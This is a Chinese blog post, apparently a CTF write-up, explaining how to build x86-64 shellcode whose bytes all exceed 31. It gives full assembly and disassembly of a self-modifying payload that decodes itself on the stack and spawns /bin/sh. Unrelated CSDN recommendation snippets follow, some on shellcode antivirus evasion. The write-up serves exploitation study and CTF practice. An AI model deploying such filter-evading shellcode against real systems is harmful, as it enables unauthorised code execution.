Shellcode——绕过31

于 2023-10-26 22:51:24 发布
阅读量500 收藏
点赞数
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53932372/article/details/134066484
版权

遇到了一道ctf题目,要求shellcode的每一个字节都必须大于31。

如果没有这个限制的话:
在这里插入图片描述

这是最方便的了。

但是必须大于31.

所以我想,那就吧所有小于31的加上31,然后运行的时候这部分代码自己修改自己。

也就是SMC,,简称自修改代码。

要注意:
小端输入
rsp寻址

~/Desktop/111 
❯ objdump -d ./shellcode -M intel

./shellcode:     file format elf64-x86-64


Disassembly of section .text:

0000000000401000 <_start>:
  401000:	48 b8 32 41 37 32 32 	movabs rax,0x3232323232374132
  401007:	32 32 32 
  40100a:	50                   	push   rax
  40100b:	48 b8 31 f6 31 d2 b8 	movabs rax,0x32323bb8d231f631
  401012:	3b 32 32 
  401015:	50                   	push   rax
  401016:	48 b8 2f 73 68 32 57 	movabs rax,0xe78948573268732f
  40101d:	48 89 e7 
  401020:	50                   	push   rax
  401021:	48 b8 31 c0 48 bf 2f 	movabs rax,0x6e69622fbf48c031
  401028:	62 69 6e 
  40102b:	50                   	push   rax
  40102c:	68 32 32 32 32       	push   0x32323232
  401031:	68 32 32 32 32       	push   0x32323232
  401036:	68 32 32 32 32       	push   0x32323232
  40103b:	68 32 32 32 32       	push   0x32323232
  401040:	8a 44 24 2b          	mov    al,BYTE PTR [rsp+0x2b]
  401044:	2c 32                	sub    al,0x32
  401046:	88 44 24 2b          	mov    BYTE PTR [rsp+0x2b],al
  40104a:	8a 44 24 36          	mov    al,BYTE PTR [rsp+0x36]
  40104e:	2c 32                	sub    al,0x32
  401050:	88 44 24 36          	mov    BYTE PTR [rsp+0x36],al
  401054:	8a 44 24 37          	mov    al,BYTE PTR [rsp+0x37]
  401058:	2c 32                	sub    al,0x32
  40105a:	88 44 24 37          	mov    BYTE PTR [rsp+0x37],al
  40105e:	8a 44 24 38          	mov    al,BYTE PTR [rsp+0x38]
  401062:	2c 32                	sub    al,0x32
  401064:	88 44 24 38          	mov    BYTE PTR [rsp+0x38],al
  401068:	8a 44 24 39          	mov    al,BYTE PTR [rsp+0x39]
  40106c:	2c 32                	sub    al,0x32
  40106e:	88 44 24 39          	mov    BYTE PTR [rsp+0x39],al
  401072:	8a 44 24 3a          	mov    al,BYTE PTR [rsp+0x3a]
  401076:	2c 32                	sub    al,0x32
  401078:	88 44 24 3a          	mov    BYTE PTR [rsp+0x3a],al
  40107c:	48 83 c4 20          	add    rsp,0x20
  401080:	48 89 e7             	mov    rdi,rsp
  401083:	ff e7                	jmp    rdi

asm代码:

section .text
    global _start

_start:
    ; 打开 /bin/sh
    mov rax, 0x3232323232374132
    push rax

    ;11
    mov rax, 0x32323bb8d231f631
    push rax

    ;22 23
    mov rax, 0xe78948573268732f
    push rax

    ;24 25 26 27 28 29 30 31
    mov rax, 0x6e69622fbf48c031
    push rax

    push 0x32323232
    push 0x32323232  
    push 0x32323232  
    push 0x32323232

    mov al, [rsp+31+12]
    sub al, 0x32
    mov [rsp+31+12], al

    mov al, [rsp+31+23]
    sub al, 0x32
    mov [rsp+31+23], al

    mov al, [rsp+31+24]
    sub al, 0x32
    mov [rsp+31+24], al

    mov al, [rsp+31+25]
    sub al, 0x32
    mov [rsp+31+25], al

    mov al, [rsp+31+26]
    sub al, 0x32
    mov [rsp+31+26], al

    mov al, [rsp+31+27]
    sub al, 0x32
    mov [rsp+31+27], al
    add rsp,32
    mov rdi,rsp
    jmp rdi

    ;mov rdi, rsp
    ;xor esi, esi
    ;xor edx, edx
    ;mov eax, 0x3b
    ;syscall
we have a whole life
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ie7 0day当中的shellcode的escape+xor21加密
09-06
这种技术在恶意软件中常见,用于绕过安全机制,提高攻击的成功率。 总结来说,"ie7 0day当中的shellcode的escape+xor21加密"是一种高级的加密技术,它结合了VBScript和JavaScript的特性,通过对shellcode进行异或和...
看,老妈!我没有用_Shellcode:浏览器开发利用案例研究_——_Internet_Explorer_11.pdf
08-07
例如如果你想要使用内核漏洞来绕过沙箱,那么你需要绕过所有的内核利用缓和措施,如内核 DEP,KASLR,SMEP,空指针引用保护等。最后如果你希望你的利用程序在微软增强缓和工具包(EMET)下工具,那么难度就更大了。 ...
GhostInTheShellcode2015:Shellcode 2015 CTF 中的 Ghost 解决方案
06-23
在Ghost in the Shellcode 2015比赛中,参赛者面临的挑战可能是找到特定程序中的安全漏洞,然后设计出能够绕过安全防护机制的Shellcode。这需要掌握以下关键技术: 1. **漏洞发现**:参赛者需要具备深厚的逆向工程...
65.远控免杀专题(65)-shellcode免杀实践1
08-03
本文主要探讨的是如何通过不同的方法实现shellcode(一段可以直接由CPU执行的机器码)的免杀,从而绕过杀毒软件的检测。 一、直接生成可执行文件 在第一部分,作者介绍了通过使用Code Signing Studio(CS)生成...
Linux二进制漏洞利用——突破系统防御的关键技术.pdf
09-06
随着缓解技术的发展,攻击者也开始采用新的利用策略,如返回导向编程(ROP)、跳跃导向编程(JOP)等,这些技术绕过了DEP和NX Bit的限制,通过组合利用程序中的合法指令序列来执行攻击代码。此外,针对ASLR的攻击...
wx470校园保修系统小程序-springboot+vue+uniapp.zip(可运行源码+sql文件+文档)
07-20
基于web的校园报修系统使用Java语言进行编码,使用Mysql创建数据表保存本系统产生的数据。系统可以提供信息显示和相应服务,总之,基于web的校园报修系统集中管理信息,有着保密性强,效率高,存储空间大,成本低等诸多优点。它可以降低信息管理成本,实现信息管理计算机化。 学生信息管理页面,此页面提供给管理员的功能有:学生信息的查询管理,可以删除学生信息、修改学生信息、新增学生信息,还进行了对用户名称的模糊查询的条件。维修人员管理页面,此页面提供给管理员的功能有:查看已发布的维修人员数据,修改维修人员,维修人员作废,即可删除,还进行了对维修人员名称的模糊查询 维修人员信息的类型查询等等一些条件。故障上报管理页面,此页面提供给管理员的功能有:根据故障上报进行条件查询,还可以对故障上报进行新增、修改、查询操作等等。论坛信息管理页面,此页面提供给管理员的功能有:根据论坛信息进行新增、修改、查询操作等等。
wx447火锅店点餐系统-ssm+vue+uniapp.zip(可运行源码+sql文件+文档)
07-20
本火锅店点餐系统采用Java语言和Vue技术,框架采用SSM,搭配Mysql数据库,运行在Idea里,采用小程序模式。本火锅店点餐系统提供管理员、用户两种角色的服务。总的功能包括菜品的查询、菜品的购买、餐桌预定和订单管理。本系统可以帮助管理员更新菜品信息和管理订单信息,帮助用户实现在线的点餐方式,并可以实现餐桌预定。本系统采用成熟技术开发可以完成点餐管理的相关工作。 本系统的功能围绕用户、管理员两种权限设计。根据不同权限的不同需求设计出更符合用户要求的功能。本系统中管理员主要负责审核管理用户,发布分享新的菜品,审核用户的订餐信息和餐桌预定信息等,用户可以对需要的菜品进行购买、预定餐桌等。用户可以管理个人资料、查询菜品、在线点餐和预定餐桌、管理订单等,用户的个人资料是由管理员添加用户资料时产生,用户的订单内容由用户在购买菜品时产生,用户预定信息由用户在预定餐桌操作时产生。 本系统的功能设计为管理员、用户两部分。管理员为菜品管理、菜品分类管理、用户管理、订单管理等,用户的功能为查询菜品,在线点餐、预定餐桌、管理个人信息等。 管理员负责用户信息的删除和管理,用户的姓名和手机号都可以由管理员在此功能里看到。管理员可以对菜品的信息进行管理、审核。本功能可以实现菜品的定时更新和审核管理。本功能包括查询餐桌,也可以发布新的餐桌信息。管理员可以查询已预定的餐桌,并进行审核。管理员可以管理公告和系统的轮播图,可以安排活动。管理员可以对个人的资料进行修改和管理,管理员还可以在本功能里修改密码。管理员可以查询用户的订单,并完成菜品的安排。 当用户登录进系统后可以修改自己的资料,可以使自己信息的保持正确性。还可以修改密码。用户可以浏览所有的菜品,可以查看详细的菜品内容,也可以进行菜品的点餐。在本功能里用户可以进行点餐。用户可以浏览没有预定出去的餐桌,选择合适的餐桌可以进行预定。用户可以管理购物车里的菜品。用户可以管理自己的订单,在订单管理界面里也可以进行查询操作。
【独家首发】Matlab实现金枪鱼优化算法TSO优化Transformer-BiLSTM实现负荷数据回归预测.rar
07-20
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
物联网工程_基于ZigBee技术的图书馆节约用电管理系统设计.docx
07-20
物联网工程_基于ZigBee技术的图书馆节约用电管理系统设计
算法与数据结构 分布式算法课程 第13章 实用互斥算法.具有读-修改-写操作的算法 共72页.pdf
07-20
【课程大纲】 第01章 简介 共68页.pdf 第02章 分布式算法简介 共59页.pdf 第03章 集群领导选举 分布式锁 共83页.pdf 第04章 通用同步网络的集群领导选举 共69页.pdf 第05章同步网络中的基础计算 共76页.pdf 第06章 分布式一致性 共48页.pdf 第07章 Byzantine协议 共34页.pdf 第08章 异步系统模型 共47页.pdf 第09章 基本异步网络算法 共71页.pdf 第10章 同步化器 共39页.pdf 第11章 异步共享内存系统 共49页.pdf 第12章 ASM - Peterson’s算法 共43页.pdf 第13章 实用互斥算法.具有读-修改-写操作的算法 共72页.pdf
Python-函数.doc
07-20
Python
125N2RG-VB一种N-Channel沟道TO220封装MOS管
07-20
125N2RG-VB;Package:TO220;Configuration:Single-N-Channel;VDS:30V;VGS:20(±V);Vth:1.7V;RDS(ON)=2.8mΩ@VGS=4.5V;RDS(ON)=2mΩ@VGS=10V;ID:140A;Technology:Trench;
毕业设计javajsp银行业务在线申请系统(jsp+mysql)-qkrp源码含文档工具包
07-20
毕业设计javajsp银行业务在线申请系统(jsp+mysql)-qkrp源码含文档工具包 页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 该系统主要包括管理员管理,理财产品管理,用户管理,贷款审批,账户管理,消费管理,交费管理,转账管理,理财产品,我的贷款等功能模块 包含:源码、数据库脚本、论文、环境工具包、相同框架项目的安装教程(在说明文档中)
物联网工程_基于WiFi技术的菌菇烘干工厂管理系统设计与实现.docx
07-20
物联网工程_基于WiFi技术的菌菇烘干工厂管理系统设计与实现
[课设项目]Java-SSM框架开发医院住院管理系统的设计与实现+jsp+MySQL+前后端分离毕业论文和源码.zip
07-20
本系统是为计算机相关专业学生设计,涵盖前后端分离技术,以提升实际开发技能。 系统基于SSM框架和MySQL数据库,采用JDK、IDEA和Tomcat开发,已严格测试,保证稳定运行。 功能包括: 1. 患者信息管理:录入、查询、更新和删除信息。 2. 医生信息管理:类似患者信息管理。 3. 住院记录管理:新增、查看、编辑和删除住院记录。 4. 护理服务管理:记录患者护理情况。 5. 药物与处方管理:管理药物信息和医生处方。 6. 费用结算管理:计算患者费用并结算。 系统源代码、数据库脚本和开发文档齐全,附论文参考,适合直接用于毕设或实战练习。对有一定基础的Java学习者,可在现有代码上扩展功能,如数据分析、图形化展示等,增强实用性。
-SSM同心县人民医院移动医疗系统开题报告【答辩高分内容】.doc
07-20
随着我国科技的发展和医疗改革的推进,医疗服务质量和效率成为人们越来越关注的问题。移动医疗信息系统作为一种新兴的医疗服务手段,可以有效提高医疗服务水平,改善患者就医体验,降低医疗成本,提高医疗工作效率。本题旨在研发一款医院移动医疗信息系统,为患者和医护人员提供便捷、高效的医疗服务。
[课设项目]Java-SSM框架开发前后端分离鲜花销售系统+vue+MySQL+前后端分离毕业论文和源码.zip
07-20
本项目是一个基于Java-SSM框架开发的鲜花销售系统,旨在实现前后端分离,提高系统的可维护性和扩展性。项目主要面向计算机相关专业的学生进行毕业设计,同时也可作为Java学习者的实战练习资源。 项目包含了完整的源码、数据库脚本以及详细的开发说明,并附有论文参考,使得使用者能够快速上手并顺利完成设计任务。后台采用SSM框架进行搭建,前端则采用Vue框架,数据库选用MySQL。在开发环境方面,项目支持JDK、IDEA和Tomcat等常见工具,确保了项目的兼容性和易用性。 经过严格的调试,项目已确保可以稳定运行。对于有一定Java基础的学习者,还可以在现有代码基础上进行扩展,实现更多功能,从而进一步提升自己的编程能力。 本项目的资源均为高分毕业设计、课程设计资源,质量上乘,请放心下载使用。
ssm303学生考勤管理.zip
最新发布
07-20
ssm303学生考勤管理
幸运九宫格抽奖码,九宫格抽奖系统源码php+mysql,微信抽奖系统
07-20
幸运九宫格抽奖码,九宫格抽奖系统源码php+mysql,微信抽奖系统 介绍:php+mysql幸运九宫格抽奖码抽奖系统,适合营销,门店活动,公司活动,微信抽奖,公众号抽奖。可设置背景音乐,可设置中奖概率,可以设置奖项,抽奖营销工具,广泛应用于 :公司年会、商场促销、销售促销、答谢会、线上推广:人气获客、推广。 1、本程序在PHP5.3 ~ PHP5.6环境完美运行 2、后台访问地址:域名/admin/index.php admin admin 手动安装 1、导入数据库文件到数据库 2、修改db.php填写数据库相关信息
渗透测试实战:shellcode技术详解
本书涵盖了Shellcode技术在渗透测试中的核心应用,Shellcode是一种小型可执行代码片段,常用于攻击者利用系统漏洞进行远程控制或权限提升。它主要关注网络漏洞利用技术,如缓冲区溢出攻击(Buffer Overflow Attack)...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值